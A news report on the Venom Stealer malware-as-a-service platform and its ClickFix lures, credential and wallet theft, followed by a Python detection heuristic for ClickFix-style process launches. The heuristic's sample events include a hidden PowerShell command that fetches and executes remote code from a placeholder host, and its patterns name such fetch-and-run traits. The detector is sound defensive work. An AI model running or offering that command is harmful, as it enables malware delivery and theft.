
A new malware-as-a-service (MaaS) platform that combines ClickFix social engineering with automated data exfiltration and wallet detection is being sold on the dark web for $250 a month, or $1,800 for lifetime access.
Researchers from security firm BlackFog warn that the platform is more dangerous than commodity stealers such as Lumma, Vidar, and RedLine. That’s because while most malware infects, steals data, and then stops, Venom Stealer infects, steals, cracks, drains accounts, and keeps stealing.
The criminal developer, operating under the handle Venom Stealer, sells access as a subscription, with a vetted application process, Telegram-based licensing, and a 15% affiliate program.
According to BlackFog, multiple updates were shipped in March 2026 alone, and the pace of development points to a full-time operation.
Social engineering becomes automated attack chain
Security researchers describe a platform that operates like a well-oiled machine, beginning with social engineering and quickly turning into automated data theft and financial exploitation.
As the report explains, “The infection begins when a target lands on a ClickFix page hosted by the operator,” referring to scam pages that trick users into running malicious commands themselves.
Victims are shown fake CAPTCHA checks or system errors and told to paste commands into the ‘Run dialog’ (Windows) or ‘Terminal’ (macOS).
“Because the target initiates execution themselves, the process appears user-initiated,” the report notes, adding that security tools may not spot the activity.
This bypasses behavior-based detection, which looks for unusual program activity.
Bypassing browser encryption
The report notes that the malware can also bypass browser encryption.
“The moment the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.”
BlackFog Research
Researchers note that Chrome’s v10 and v20 password encryption is bypassed by gaining higher-privileged access that doesn’t trigger a User Account Control alert.
Stolen data is then sent out immediately, leaving little evidence on the device, making detection “significantly more difficult.”
Next in the chain is automated crypto theft, as any discovered wallet data is passed to a “server-side cracking engine” where encrypted wallets are unlocked and emptied.
The malware also searches for phrases such as “File Password” and “seed finder,” suggesting that even wallet keys stored offline may be compromised.
BlackFog explains that the pernicious platform can create a continuous pipeline even after infection because it stays active, “continuously monitoring Chrome’s Login Data,” stealing newly saved credentials in real time – making password resets ineffective.
To reduce exposure to threats like Venom, researchers recommend restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering.
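The report’s point that a pasted command looks user-initiated is exactly what a detection rule can key on: on Windows the Run dialog launches its child from explorer.exe, so a script interpreter parented by explorer.exe with download-and-execute or hide-the-window switches on its command line is a strong ClickFix signal. The following hunting heuristic is an added example, not code from the article or from BlackFog; the Sysmon-style field names, the interpreter list, the command-line patterns and the event records are all constructed assumptions.

```python
"""ClickFix execution heuristic over Sysmon-style process-creation events (added example)."""
import re

# Interpreters a ClickFix lure typically makes the victim launch (assumption, not from the article).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that are unusual for a human typing into Run but common in pasted lure text.
SUSPICIOUS = [
    (re.compile(r"(?i)(^|\s)-(w|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(^|\s)-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), "invoke-expression"),
    (re.compile(r"(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"), "remote fetch"),
    (re.compile(r"(?i)https?://"), "URL in command line"),
]


def score_event(event):
    """Return the reasons an event looks like ClickFix execution; an empty list means benign."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    # Only interpreters spawned directly by the shell (Win+R / Run dialog) are of interest here.
    if image not in INTERPRETERS or parent != "explorer.exe":
        return []
    command_line = event.get("CommandLine", "")
    return [label for pattern, label in SUSPICIOUS if pattern.search(command_line)]


def find_clickfix_candidates(events, min_reasons=2):
    """Return (event, reasons) pairs for events carrying at least min_reasons suspicious traits."""
    candidates = []
    for event in events:
        reasons = score_event(event)
        if len(reasons) >= min_reasons:
            candidates.append((event, reasons))
    return candidates


# Constructed sample telemetry, not real logs: one lure-style launch, one bare shell, one
# vendor agent running a hidden script, and an ordinary Run-dialog diagnostic command.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\Agent\agent.exe",
     "CommandLine": r"powershell -w hidden -File C:\ProgramData\Vendor\inventory.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd /c "ipconfig /all"'},
]

if __name__ == "__main__":
    for event, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(event["CommandLine"], "->", ", ".join(reasons))
```

The explorer.exe parent check is what separates a pasted lure from legitimate hidden-window automation launched by a service or agent, which is why the third record is not flagged despite its `-w hidden`.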